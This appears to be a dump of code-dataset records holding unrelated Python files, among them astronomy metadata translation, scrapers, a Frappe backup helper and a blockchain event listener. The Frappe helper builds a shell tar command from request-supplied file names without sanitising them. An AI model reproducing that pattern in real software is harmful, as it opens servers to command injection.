words[i] = currentRowOfFile[i].strip().split('=')\n if words[i][0] not in percolator:\n heappush(percolator,words[i][0])\n\nwhile True:\n if completedFile.count(0) == len(files):\n break;\n else:\n total += 1\n word = heappop(percolator)\n for i in range(len(files)):\n if completedFile[i] and words[i][0] == word:\n if word in globalDict:\n globalDict[word] += ','+words[i][1]\n else:\n globalDict[word] = words[i][1]\n\n if total == chunksize:\n total = 0;\n writeToPrimary()\n globalDict.clear()\n\n currentRowOfFile[i] = filePointers[i].readline()\n currentRowOfFile[i] = currentRowOfFile[i].strip()\n\n if currentRowOfFile[i]:\n words[i] = currentRowOfFile[i].split('=')\n if words[i][0] not in percolator:\n heappush(percolator,words[i][0])\n else:\n completedFile[i] = 0\n filePointers[i].close()\n os.remove(files[i])\n\nwriteToPrimary()\nwriteToSecondary()\nstop = timeit.default_timer()\nprint (stop - start)\n","repo_name":"Btanwani77/Wiki-Search-Engine","sub_path":"merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20354642273","text":"\"\"\"\nCookie web scraper for Maddy - Woohoo\n\"\"\"\nfrom flask import Flask\nimport requests\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom twilio.rest import Client\nimport os\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef main():\n chrome_options = webdriver.ChromeOptions()\n chrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_options.add_argument(\"--no-sandbox\")\n driver = webdriver.Chrome(\n executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"),\n chrome_options=chrome_options,\n )\n driver.get(\"https://crumblcookies.com/\")\n weekList = driver.find_element_by_id(\"weekly-cookie-flavors\")\n weeklies = weekList.find_elements_by_tag_name(\"li\")\n\n cookies = \"This week's Crumbl flavors are:\\n\"\n for cookie in weeklies:\n flavor = cookie.find_elements_by_tag_name(\"h3\")[0].text\n cookies += flavor + \"\\n\"\n\n driver.close()\n\n account_id = os.environ.get(\"TWIL_ACCT\")\n auth_token = os.environ.get(\"AUTH_TOKEN\")\n client = Client(account_id, auth_token)\n\n message = client.messages.create(\n body=cookies, from_=\"+15036766473\", to=\"+19524262052\"\n )\n\n return cookies\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"RyanSMcKenzie/my-cookie-sender","sub_path":"cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36786569142","text":"# -*- coding:gbk -*- \nimport urllib.request\nimport json\nimport time\nimport sys\n\n#二维字典相关\ndef dict2d_construct(thedict, key_a, key_b, val):\n if key_a in thedict:\n thedict[key_a].update({key_b: val})\n else:\n thedict.update({key_a:{key_b: val}})\n#输出相关\ndef printex(strs):\n\tsys.stdout.write(\" \\r\")\n\tsys.stdout.flush()\n\tsys.stdout.write(strs+\"\\r\")\n\tsys.stdout.flush()\n\t\ndef savefile(data,listhead,fw,fs):\n\tfor index in data:\n\t\tfor head in listhead:\n\t\t\tif head in data[index]:\n\t\t\t\ttry:\n\t\t\t\t\tfw.write(str(data[index][head]).replace(\"\\n\",\"\\\\n\")+\"\\t\")\n\t\t\t\texcept Exception as err:\n\t\t\t\t\tfw.write(\"【非文本格式信息】\\t\")\n\t\t\telse:\n\t\t\t\tfw.write(\"\\t\")\n\t\tfw.write(\"\\n\")\n\tfs.write(json.dumps(data))\n\n#初始化\nURL_LISTAPI = 
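On the `merge.py` record above: the hand-rolled "percolator" heap (plus the `not in percolator` membership test, which is O(n) per check) can be replaced by `heapq.merge`, which lazily k-way-merges already-sorted streams. A sketch merging `word=postings` index files, assuming each input file is sorted by word:

import heapq
from itertools import groupby

def merge_postings(paths, out_path):
    files = [open(p) for p in paths]
    try:
        rows = (line.rstrip("\n").split("=", 1) for line in heapq.merge(*files))
        with open(out_path, "w") as out:
            for word, group in groupby(rows, key=lambda r: r[0]):
                out.write(word + "=" + ",".join(r[1] for r in group) + "\n")
    finally:
        for f in files:
            f.close()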
\"http://www.pkuhelper.com/services/pkuhole/api.php?action=getlist&p=\"\nURL_COMMENTAPI = \"http://www.pkuhelper.com/services/pkuhole/api.php?action=getcomment&pid=\"\n #上次错误保存的结果\ntry:\n\tp = int(open(\"lasterr.tmp\").read())\nexcept:\n\tp = 0\ndata = {}\nindex = 0\nlisthead = ['cid','pid','text','timestamp','hidden','anonymous','islz','name','type','reply','likenum','extra','url','hot','self_recordtime']\nfw = open(\"pkuhole.tab\",'a',encoding='gbk')\nfs = open(\"pkuhole.list\",'a',encoding='gbk')\n\n\nwhile(1):\n\t#下载与解析\n\t\n\ttry:\n\t\tresponse = urllib.request.urlopen(URL_LISTAPI + str(p))\n\t\tstrjson = response.read().decode('utf-8')\n\t\tljson = json.loads(strjson,strict = False)\n\texcept Exception as err:\n\t\tprint(err,p)\n\t\tsavefile(data,listhead,fw,fs)\n\t\topen(\"lasterr.tmp\",'w').write(str(p))\n\t\traise NameError(err)\n\t\t\n\t#没了的话收工\n\tif ljson['data']==[]:\n\t\tbreak\n\tprintex(\"Downloading the Page: \"+ str(p))\n\t\n\tfor post in ljson['data']:\n\t\t#先保存主洞\n\t\tindex += 1\n\t\tfor key in post:\n\t\t\tdict2d_construct(data,index,key,post[key])\n\t\t\tdict2d_construct(data,index,'self_recordtime',time.ctime())\n\t\t#如果有回复的话,再抓取回复\n\t\tif int(post['reply'])!=0:\n\t\t\ttry:\n\t\t\t\tresreply = urllib.request.urlopen(URL_COMMENTAPI + post['pid'])\n\t\t\t\tprintex(\"Downloading the Page: \"+ str(p) +\" -> reply\")\n\t\t\texcept Exception as err:\n\t\t\t\tprint(err,p)\n\t\t\t\tsavefile(data,listhead,fw,fs)\n\t\t\t\topen(\"lasterr.tmp\",'w').write(str(p))\n\t\t\t\traise NameError(err)\n\t\t\t\t\n\t\t\tstrjson = resreply.read().decode('utf-8')\n\t\t\trjson = json.loads(strjson,strict = False)\n\t\t\tfor reply in rjson['data']:\n\t\t\t\tindex += 1\n\t\t\t\tfor key in reply:\n\t\t\t\t\tdict2d_construct(data,index,key,reply[key])\n\t\t\t\t\tdict2d_construct(data,index,'self_recordtime',time.ctime())\n\tp += 1\n\ttime.sleep(0.1)\n#写tab文件\n\n\n\n#清空上次保存\nopen(\"lasterr.tmp\",'w').write(\"0\")","repo_name":"byemypast/PKUHoleDownload","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20449983944","text":"\n__all__ = (\"VircamTranslator\", )\n\nfrom astro_metadata_translator import cache_translation, FitsTranslator\nfrom astro_metadata_translator.translators.helpers import (\n tracking_from_degree_headers,altaz_from_degree_headers)\nimport astropy.units as u\nfrom astropy.time import Time\nfrom astropy.coordinates import SkyCoord, Angle, AltAz, EarthLocation\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\n\nclass VircamTranslator(FitsTranslator):\n \"\"\"Metadata translator for VISTA FITS headers.\n\n Under normal circumstances, translators are found in the astro_metadata_translator \n repository. However, it is possible to also put them in an obs_package, provided that \n they are imported in both the _instrument.py and rawFormatter.py files.\n\n This one is in obs_vista to keep everything togeter in one place. \n \"\"\"\n\n \"\"\"Name of this translation class\"\"\"\n name = \"VIRCAM\"\n\n \"\"\"Supports the VIRCAM instrument.\"\"\"\n supported_instrument = \"VIRCAM\"\n\n \"\"\"\n _const_map includes properties that you may not know, nor can calculate.\n \n Bear in mind that some examples listed here as \"None\" may require units or be a \n specific class should you want to upgrade them to _trivial_map or to_<>. \n For example, \"altaz_begin\" needs to be an astropy.coordinates.AltAz class. 
\n \n https://www.eso.org/sci/facilities/paranal/instruments/vircam/inst.html\n On the sky (in the default instrument rotator position) +Y corresponds to N, \n and +X to West:\n \"\"\"\n _const_map = {\"boresight_rotation_coord\": \"sky\",\n \"detector_group\": None,\n \"boresight_airmass\": None, # This could be calculated.\n # \"boresight_rotation_angle\": Angle(0 * u.deg),\n \"science_program\": None,\n # \"temperature\": 300. * u.K,\n \"pressure\": 985. * u.hPa,\n \"relative_humidity\": None,\n # \"altaz_begin\": AltAz(0*u.deg,90*u.deg), # This could be calculated.\n #\"location\": None,\n }\n\n \"\"\"\n _trivial_map includes properties that can be taken directly from header\n \"\"\"\n _trivial_map = {\n #\"exposure_id\": \"ESO DET EXP NO\",\n #\"visit_id\": \"ESO DET EXP NO\",\n #\"temperature\":(\"ESO INS THERMAL AMB MEAN\", dict(unit=u.K)),\n #\"boresight_airmass\": \"\"\n \"observation_id\": \"ESO DET EXP NO\",\n #\"detector_exposure_id\": \"ESO DET EXP NO\",\n \"detector_num\": \"ESO DET CHIP NO\",\n \"detector_serial\": \"ESO DET CHIP NO\",\n # \"physical_filter\": \"HIERARCH ESO INS FILT1 NAME\",\n #\"dithers\": \"ESO DET NDIT\",\n \"exposure_time\": (\"EXPTIME\", dict(unit=u.s)),\n \"dark_time\": (\"EXPTIME\", dict(unit=u.s)),\n # This is a hack we need to merge to primary header\n \"object\": \"ORIGIN\",\n #\"observation_type\": \"ESO DPR TYPE\",\n \"telescope\": (\"TELESCOP\", dict(default=\"VISTA\")),\n \"instrument\": (\"INSTRUME\", dict(default=\"VIRCAM\")),\n }\n \n# detector_names = {\n# 1: '1', 2: '2', 3: '3', 4: '4', 5: '5', 6: '6', 7: '7', 8: '8', \n# 9: '9', 10: '10', 11: '11', 12: '12', 13: '13', 14: '14', 15: '15', 16: '16', }\n\n @classmethod\n def can_translate(cls, header, filename=None):\n \"\"\"\n butler ingest-raws cycles through the known translators, using this method to \n determine whether each one can translate supplied header. \n\n This example just checks the INSTRUME header keyword and returns True if it \n contains \"VIRCAM\". However, you can make this as stringent as you like (e.g., \n perhaps you can currently handle a limited range of filters) \n\n Parameters\n ----------\n header : `dict`-like\n Header to convert to standardized form.\n filename : `str`, optional\n Name of file being translated.\n Returns\n -------\n can : `bool`\n `True` if the header is recognized by this class. `False`\n otherwise.\n \"\"\"\n\n # Use INSTRUME. Because of defaulting behavior only do this\n # if we really have an INSTRUME header\n\n# if \"INSTRUME\" in header:\n# \n# if header[\"INSTRUME\"] == \"VIRCAM\":\n# \n# return True\n# return False\n if \"INSTRUME\" in header:\n via_instrume = super().can_translate(header, filename=filename)\n if via_instrume:\n return via_instrume\n# if cls.is_keyword_defined(header, \"FILTER\") and \"VIRCAM\" in header[\"FILTER\"]:\n# return True\n return False\n\n \"\"\"\n The to_<> methods are used when properties can't be trivially taken from the \n header. 
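The _trivial_map entries above pair a metadata property with a header keyword, optionally carrying a unit or a default. A sketch of how such a map can be applied, using plain dicts in place of real FITS headers; this shows only the shape of the idea, not astro_metadata_translator's actual implementation:

import astropy.units as u

TRIVIAL_MAP = {
    "exposure_time": ("EXPTIME", {"unit": u.s}),
    "telescope": ("TELESCOP", {"default": "VISTA"}),
}

def apply_trivial_map(header, trivial_map):
    out = {}
    for prop, (keyword, opts) in trivial_map.items():
        value = header.get(keyword, opts.get("default"))
        if value is not None and "unit" in opts:
            value = value * opts["unit"]  # attach the astropy unit
        out[prop] = value
    return out

print(apply_trivial_map({"EXPTIME": 30.0}, TRIVIAL_MAP))
# {'exposure_time': <Quantity 30. s>, 'telescope': 'VISTA'}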
\n \n For example, the date in the header needs to be converted into an astropy.Time class.\n \"\"\"\n @cache_translation\n def to_datetime_begin(self):\n\n date = self._header[\"DATE-OBS\"]\n # print(date)\n #date = [date[0:4], date[4:6], date[6:]]\n #date = '-'.join(date)\n t = Time(date, format=\"isot\", scale=\"utc\")\n return t\n \n @cache_translation\n def to_boresight_rotation_angle(self):\n \"\"\"\"Give zero for typical pointing == -90deg\"\"\"\n #primary=fits.open(self.filename)[0]\n #posang=primary.header[\"HIERARCH ESO TEL POSANG\"]\n posang=self._header[\"ESO TEL POSANG\"]\n return Angle(-(posang + 90.)* u.deg) #+90?\n \n# @cache_translation\n# def to_boresight_airmass(self):\n# return self._header[\"ESO OBS AIRM \"] # requested maximum - not available for stack\n\n @cache_translation\n def to_datetime_end(self):\n datetime_end = self.to_datetime_begin() + self.to_exposure_time()\n return datetime_end\n \n @cache_translation\n def to_temperature(self):\n\n #print(self._header)\n# primary=fits.open(self.filename)[0]\n# temp=primary.header[\"ESO INS THERMAL AMB MEAN\"]*u.K\n temp=self._header[\"ESO INS THERMAL AMB MEAN\"]*u.K\n return temp\n \n @cache_translation\n def to_tracking_radec(self):\n # Docstring will be inherited. Property defined in properties.py\n radecsys = (\"RADECSYS\",)\n radecpairs = ((\"CRVAL1\", \"CRVAL2\"),)\n #print(\"FILENAME:\",self.filename)\n# #return None\n# \n# \n# wcs_input_dict = {\n# 'CTYPE1': self._header['CTYPE1'],\n# 'CUNIT1': 'deg',\n# 'CD1_1': self._header['CD1_1'], \n# 'CD1_2': self._header['CD1_2'] , \n# 'CRPIX1': self._header['CRPIX1'],\n# 'CRVAL1': self._header['CRVAL1'],\n# 'NAXIS1': self._header['NAXIS1'],\n# \n# 'CTYPE2': self._header['CTYPE2'],\n# 'CUNIT2': 'deg', \n# 'CD2_1': self._header['CD2_1'], \n# 'CD2_2': self._header['CD2_2'],\n# 'CRPIX2': self._header['CRPIX2'],\n# 'CRVAL2': self._header['CRVAL2'],\n# 'NAXIS2': self._header['NAXIS2'],\n# 'PV2_1': self._header['PV2_1'], \n# 'PV2_2': self._header['PV2_2'], \n# 'PV2_3': self._header['PV2_3'], \n# 'PV2_4': self._header['PV2_4'], \n# 'PV2_5': self._header['PV2_5'], \n# }\n# w = WCS(wcs_input_dict)\n #return w.pixel_to_world(0,0)\n #primary=fits.open(self.filename)[0]\n #c=SkyCoord(primary.header['RA'],primary.header['DEC'],unit='deg')\n #return c\n return tracking_from_degree_headers(self, radecsys, radecpairs, unit=u.deg)\n# return w.pixel_to_world(self._header['NAXIS1']/2,self._header['NAXIS2']/2)\n# print(self._header)\n# radecsys = (\"RADECSYS\",)\n# radecpairs = ((\"RA\", \"DEC\"),)\n# return tracking_from_degree_headers(self, radecsys, radecpairs, unit=u.deg)\n \n \n\n @cache_translation\n #Not working possibly due to not being in extension header\n def to_altaz_begin(self):\n # Docstring will be inherited. 
Property defined in properties.py\n# primary=fits.open(self.filename)[0]\n# return AltAz(primary.header[\"ESO TEL AZ\"]*u.deg,primary.header[\"ESO TEL ALT\"]*u.deg)\n return altaz_from_degree_headers(self, ((\"ESO TEL ALT\",\"ESO TEL AZ\"),),\n self.to_datetime_begin(), \n is_zd=set([\"ESO TEL ALT\"]))\n\n @cache_translation\n def to_physical_filter(self):\n \"\"\"Calculate physical filter.\n We are reading the headers from the image layers of a multiextension fits\n Not from the primary HDU\n\n Returns\n -------\n filter : `str`\n The full filter name.\n \"\"\"\n if self.is_key_ok(\"FILTER\"):\n value = 'VIRCAM-{}'.format(self._header[\"FILTER\"].strip())\n self._used_these_cards(\"FILTER\")\n return value\n elif self.is_key_ok(\"FLATCOR\"):\n value = 'VIRCAM-{}'.format(self._header[\"FLATCOR\"].split('_')[0])\n self._used_these_cards(\"FLATCOR\")\n return value\n else:\n return None\n \n @cache_translation\n def to_location(self):\n \"\"\"Calculate the observatory location.\n Returns\n -------\n location : `astropy.coordinates.EarthLocation`\n An object representing the location of the telescope.\n \"\"\"\n\n # Look up the value since files do not have location\n value = EarthLocation.of_site(\"paranal\")\n\n return value\n\n# @cache_translation\n# def to_instrument(self):\n# if self._header[\"INSTRUME\"].strip(\" \") == \"VIRCAM\":\n# return \"VIRCAM\"\n# else:\n# # It should never get here, given can_translate().\n# return \"Unknown\"\n# \n# def to_telescope(self):\n# return self.to_instrument()\n @cache_translation\n def to_exposure_id(self):\n \"\"\"Calculate exposure ID.\n Returns\n -------\n id : `int`\n ID of exposure.\n \"\"\"\n value = self._header[\"ESO DET EXP NO\"]\n self._used_these_cards(\"ESO DET EXP NO\")\n return value\n\n @cache_translation\n def to_observation_counter(self):\n \"\"\"Return the lifetime exposure number.\n Returns\n -------\n sequence : `int`\n The observation counter.\n \"\"\"\n return self.to_exposure_id()\n\n @cache_translation\n def to_visit_id(self):\n # Docstring will be inherited. Property defined in properties.py\n return self.to_exposure_id()\n \n @cache_translation\n def to_detector_name(self):\n return '{:02d}'.format(self._header[\"ESO DET CHIP NO\"])\n# @cache_translation\n# def to_detector_name(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[1:]\n\n @cache_translation\n def to_observation_type(self):\n return 'science'\n \n @cache_translation\n def to_detector_exposure_id(self):\n # Docstring will be inherited. Property defined in properties.py\n exposure_id = self.to_exposure_id()\n if exposure_id is None:\n return None\n return int(\"{:07d}{:02d}\".format(exposure_id, self.to_detector_num()))\n\n# @cache_translation\n# def to_detector_group(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[0]\n\n# @cache_translation\n# def to_detector_name(self):\n# # Docstring will be inherited. Property defined in properties.py\n# name = self.to_detector_unique_name()\n# return name[1:]\n\n @classmethod\n def determine_translatable_headers(cls, filename, primary=None):\n \"\"\"Given a file return all the headers usable for metadata translation.\n VIRCAM files are multi-extension FITS with a primary header and\n each detector stored in a subsequent extension. 
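to_boresight_rotation_angle above turns the ESO TEL POSANG header into an astropy Angle with a sign flip and a 90 degree offset. The arithmetic in isolation (astropy only; the -90 input mirrors the "typical pointing" mentioned in the record):

import astropy.units as u
from astropy.coordinates import Angle

def rotator_angle(posang_deg):
    # flip the sign and offset by 90 deg, as the translator does
    return Angle(-(posang_deg + 90.0) * u.deg)

print(rotator_angle(-90.0))  # 0d00m00s, i.e. zero rotation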
VIRCAM uses\n        ``INHERIT=T`` and each detector header will be merged with the\n        primary header.\n        Guide headers are not returned.\n        Parameters\n        ----------\n        filename : `str`\n            Path to a file in a format understood by this translator.\n        primary : `dict`-like, optional\n            The primary header obtained by the caller. This is sometimes\n            already known, for example if a system is trying to bootstrap\n            without already knowing what data is in the file. Will be\n            merged with detector headers if supplied, else will be read\n            from the file.\n        Yields\n        ------\n        headers : iterator of `dict`-like\n            Each detector header in turn. The supplied header will be merged\n            with the contents of each detector header.\n        Notes\n        -----\n        This translator class is specifically tailored to raw VIRCAM data and\n        is not designed to work with general FITS files. The normal paradigm\n        is for the caller to have read the first header and then called\n        `determine_translator()` on the result to work out which translator\n        class to then call to obtain the real headers to be used for\n        translation.\n        \"\"\"\n        # Circular dependency so must defer import.\n        from astro_metadata_translator.headers import merge_headers\n\n        # Since we want to scan many HDUs we use astropy directly to keep\n        # the file open rather than continually opening and closing it\n        # as we go to each HDU.\n\n        with fits.open(filename) as fits_file:\n            # Astropy does not automatically handle the INHERIT=T in\n            # VIRCAM headers so the primary header must be merged.\n            first_pass = True\n\n            for hdu in fits_file:\n                if first_pass:\n                    if not primary:\n                        primary = hdu.header\n                    first_pass = False\n                    continue\n\n                header = hdu.header\n                if \"EXTNAME\" not in header:  # the primary header has no EXTNAME\n                    continue\n\n                yield merge_headers([primary, header], mode=\"overwrite\")\n","repo_name":"lsst-uk/obs_vista","sub_path":"python/lsstuk/obs/vista/translators/vircam.py","file_name":"vircam.py","file_ext":"py","file_size_in_byte":14354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"14332547344","text":"import frappe, os\r\nfrom frappe.utils import get_url\r\n\r\n@frappe.whitelist()\r\ndef take_backup():\r\n\tbackup_dict = backup()\r\n\t\r\n\tdb_url = '/backups/%s' % os.path.basename(backup_dict.get('db'))\r\n\tfiles_url = '/backups/%s' % os.path.basename(backup_dict.get('files'))\r\n\tprivate_files_url = '/backups/%s' % os.path.basename(backup_dict.get('private_files'))\r\n\t\r\n\t# backup name\r\n\tsplit_name = os.path.basename(backup_dict.get('db')).split('_')\r\n\t\r\n\t# just get the filename\r\n\tbackup_name = '_'.join(split_name[:-1])\r\n\t\r\n\todb = backup_dict.get('odb')\r\n\tabs_paths = [odb.backup_path_db, odb.backup_path_files, odb.backup_path_private_files]\r\n\t\r\n\treturn {'db': db_url, 'files': files_url, 'private_files': private_files_url, 'backup_name': backup_name, 'abs_paths': abs_paths}\r\n\r\n@frappe.whitelist()\r\ndef zip_and_download_files(filename, files):\r\n\t\r\n\t# string to list\r\n\timport ast\r\n\tfiles = ast.literal_eval(files)\r\n\t\r\n\tzip_path = os.path.join(frappe.get_site_path(\"private\", \"backups\"), filename + \".consolebackup\")\r\n\t# this zip can be opened using tar only. 
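determine_translatable_headers merges every named extension header with the primary to emulate FITS INHERIT=T. A self-contained sketch of that merge on in-memory HDUs, using only astropy (merge_headers from astro_metadata_translator is replaced by a plain copy-and-update, which matches its overwrite mode):

from astropy.io import fits

hdul = fits.HDUList([fits.PrimaryHDU(), fits.ImageHDU(name="DET01")])
hdul[0].header["INSTRUME"] = "VIRCAM"
hdul[1].header["HIERARCH ESO DET CHIP NO"] = 1  # hierarchical ESO keyword

def merged_headers(hdulist):
    primary = hdulist[0].header
    for hdu in hdulist[1:]:
        if "EXTNAME" not in hdu.header:
            continue  # skip unnamed extensions, as the translator does
        merged = primary.copy()
        merged.update(hdu.header)  # extension keywords win on conflict
        yield merged

for header in merged_headers(hdul):
    print(header["INSTRUME"], header["ESO DET CHIP NO"])  # VIRCAM 1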
not in windows\r\n\t# files are having paths relative from sites folder\r\n\tcmd_string = \"\"\"tar -cf %s %s\"\"\" % (zip_path, \" \".join(files))\t\t\r\n\terr, out = frappe.utils.execute_in_shell(cmd_string)\r\n\t\r\n\treturn '/backups/%s' % os.path.basename(zip_path)\r\n\t\r\ndef backup():\r\n\t# backup data\r\n\tfrom frappe.utils.backups import BackupGenerator\r\n\todb = BackupGenerator(frappe.conf.db_name, frappe.conf.db_name,\\\r\n\t\t\t\t\t\t frappe.conf.db_password, db_host = frappe.db.host)\r\n\t# older than is not applicable since its forced\r\n\todb.get_backup(older_than=1, ignore_files=False, force=True)\r\n\t\r\n\t# odb.backup_path_db\r\n\t# odb.backup_path_files\r\n\t# odb.backup_path_private_files\r\n\treturn {'db': odb.backup_path_db, 'files': odb.backup_path_files, 'private_files': odb.backup_path_private_files, 'odb': odb}\r\n\r\n\t\r\n","repo_name":"consoleerp/consoleerp_erpnext_client","sub_path":"consoleerp_erpnext_client/utils/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11100028085","text":"from web3 import Web3\nimport asyncio\nimport json\nimport os\nfrom pymongo import MongoClient\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nprovider = Web3.HTTPProvider(os.getenv('PROVIDER'))\nweb3 = Web3(provider)\nprint(web3.isConnected())\nprint(os.getenv('MONGO_URI'))\nmdb = MongoClient(os.getenv('MONGO_URI_SPEC'))\n\n\n\n# this contract has been deployed on the goerli net\n# contract_address_saturn_box = os.getenv('ADDRESS_SATURN_BOX')\ncontract_address_saturn_mkp = os.getenv('ADDRESS_SATURN_MKP')\n# with open(\"./src/abi/abiSaturnBox.json\", \"r\") as f:\n# contract_abi_saturn_box = json.loads(f.read())\nwith open(\"./src/abi/abiSaturnMKP.json\", \"r\") as f:\n contract_abi_saturn_mkp = json.loads(f.read())\n\n# contract_saturn_box = web3.eth.contract(address=contract_address_saturn_box, abi=contract_abi_saturn_box)\ncontract_saturn_mkp = web3.eth.contract(address=contract_address_saturn_mkp, abi=contract_abi_saturn_mkp)\n\ndef handle_mint(event):\n args = event.get('args')\n tokenDetail = args.get('tokenDetail')\n agentDetail = tokenDetail[0]\n mdb[\"marketplace\"][\"token_info\"].update_one(filter={\n \"address\": args.get('requester')\n },\n update ={\n \"$set\":{\n f\"tokens.{agentDetail[0]}\":{\n \"tokenId\": agentDetail[0],\n \"agentId\": agentDetail[1],\n \"isOnchain\": agentDetail[2],\n \"baseRarity\": agentDetail[3],\n \"rarity\": agentDetail[4],\n \"level\": agentDetail[5],\n \"damage\": agentDetail[6],\n \"hp\": agentDetail[7],\n \"evasion\": agentDetail[8],\n \"armor\": agentDetail[9],\n \"combo\": agentDetail[10],\n \"precision\": agentDetail[11],\n \"accuracy\": agentDetail[12],\n \"counter\": agentDetail[13],\n \"reversal\": agentDetail[14],\n \"lock\": agentDetail[15],\n \"disarm\": agentDetail[16],\n \"speed\": agentDetail[17]\n }\n }\n },\n upsert=True\n )\n\ndef handle_event(event):\n event_data = Web3.toJSON(event)\n print(event_data)\n handle_mint(json.loads(event_data))\n\n\nasync def log_loop(event_filter, poll_interval):\n while True:\n for event in event_filter.get_new_entries():\n handle_event(event)\n await asyncio.sleep(poll_interval)\n\ndef main():\n # event_doPurchaseBox = contract_saturn_box.events.doPurchaseBox.createFilter(fromBlock='latest')\n # event_requestOnChain = contract_saturn_mkp.events.requestOnChain.createFilter(fromBlock='latest')\n # event_toOffChain = 
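zip_and_download_files above shells out to tar with string interpolation, which breaks on file names that need quoting. The standard-library tarfile module does the same job without a shell; a sketch (paths illustrative):

import tarfile

def bundle_backup(archive_path, files):
    # equivalent of `tar -cf archive_path file1 file2 ...`
    with tarfile.open(archive_path, "w") as tar:
        for path in files:
            tar.add(path)
    return archive_path

# bundle_backup("private/backups/site.consolebackup",
#               ["backups/db.sql.gz", "backups/files.tar"])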
contract_saturn_mkp.events.toOffChain.createFilter(fromBlock='latest')\n # event_toOnChain = contract_saturn_mkp.events.toOnChain.createFilter(fromBlock='latest')\n # event_doSellNFT = contract_saturn_mkp.events.doSellNFT.createFilter(fromBlock='latest')\n # event_doPurchaseNFT = contract_saturn_mkp.events.doPurchaseNFT.createFilter(fromBlock='latest')\n event_mintToken = contract_saturn_mkp.events.mintToken.createFilter(fromBlock='latest')\n\n\n loop = asyncio.get_event_loop()\n try:\n # loop.run_until_complete(asyncio.gather(log_loop(event_doPurchaseBox, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_requestOnChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_toOffChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_toOnChain, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_doSellNFT, 2)))\n # loop.run_until_complete(asyncio.gather(log_loop(event_doPurchaseNFT, 2)))\n loop.run_until_complete(asyncio.gather(log_loop(event_mintToken, 2)))\n finally:\n loop.close()\n\nif __name__ == \"__main__\":\n main()","repo_name":"bezleen/listen-event-mkp","sub_path":"listen_event_mint.py","file_name":"listen_event_mint.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32692055519","text":"import json\nimport requests\nimport csv\n\nprint(\"Enter your cookies: \\n\")\ncookies_input = input()\n\nlines = csv.reader(open('paso2.csv', 'r'), lineterminator='\\n')\n\nurl_transactions = 'https://mcdecflexuat.myvtex.com/api/payments/pvt/admin/transactions/'\nurl_end = '/payments'\ncookies = dict(VtexIdclientAutCookie=cookies_input)\n\nc= csv.writer(open(\"final.csv\", \"w\"), lineterminator='\\n')\n\ni=1\n\nfor line in lines:\n\n orderId = line[0]\n url = line[1]\n sequence = line[2]\n sellerOrderId = line[3]\n hostname = line[4]\n sellersId = line[5]\n status = line[6]\n creationDate_date = line[7]\n creationDate_time = line[8]\n email = line[9]\n firstName = line[10]\n lastName = line[11]\n document = line[12]\n transactionId = line[13]\n payments_Id = line[14]\n payments_paymentSystemName = line[15]\n payments_group = line[16]\n payments_value = line[17]\n payments_installments = line[18]\n payments_referenceValue = line[19]\n payments_lastDigits = line[20]\n payments_connectorResponses_Tid = line[21]\n payments_connectorResponses_ReturnCode = line[22]\n payments_connectorResponses_acquirer = line[23]\n payments_connectorResponses_message = line[24]\n\n if line[24]==\"null\":\n new_url = url_transactions + transactionId + url_end\n r = requests.get(new_url, cookies=cookies).json()\n try: \n length = int(len(r[0]['fields']))\n position = length - 1\n value = r[0]['fields'][position]['value']\n value_json = json.loads(value)\n payments_connectorResponses_message = value_json['message']\n except:\n payments_connectorResponses_message = \"API ERROR: \"+ str(r)\n \n c.writerow([\n\t\torderId,\n url,\n\t\tsequence,\n\t\tsellerOrderId,\n\t\thostname,\n\t\tsellersId,\n\t\tstatus,\n\t\tcreationDate_date,\n\t\tcreationDate_time,\n\t\temail,\n\t\tfirstName,\n\t\tlastName,\n\t\tdocument,\n\t\ttransactionId,\n\t\tpayments_Id,\n\t\tpayments_paymentSystemName,\n\t\tpayments_group,\n\t\tpayments_value,\n\t\tpayments_installments,\n\t\tpayments_referenceValue,\n payments_lastDigits,\n\t\tpayments_connectorResponses_Tid,\n\t\tpayments_connectorResponses_ReturnCode,\n\t\tpayments_connectorResponses_acquirer,\n\t\tpayments_connectorResponses_message\n 
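The listener above starts log_loop with the now-deprecated get_event_loop/run_until_complete pair; on current Python the same poll-and-sleep loop is usually launched with asyncio.run. A self-contained sketch with a stub standing in for web3's event filter:

import asyncio

class StubFilter:
    """Stands in for a web3 createFilter() result."""
    def __init__(self):
        self._n = 0
    def get_new_entries(self):
        self._n += 1
        return ["event-%d" % self._n] if self._n <= 3 else []

async def log_loop(event_filter, poll_interval):
    for _ in range(5):  # bounded here so the sketch terminates
        for event in event_filter.get_new_entries():
            print("handling", event)
        await asyncio.sleep(poll_interval)

asyncio.run(log_loop(StubFilter(), 0.01))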
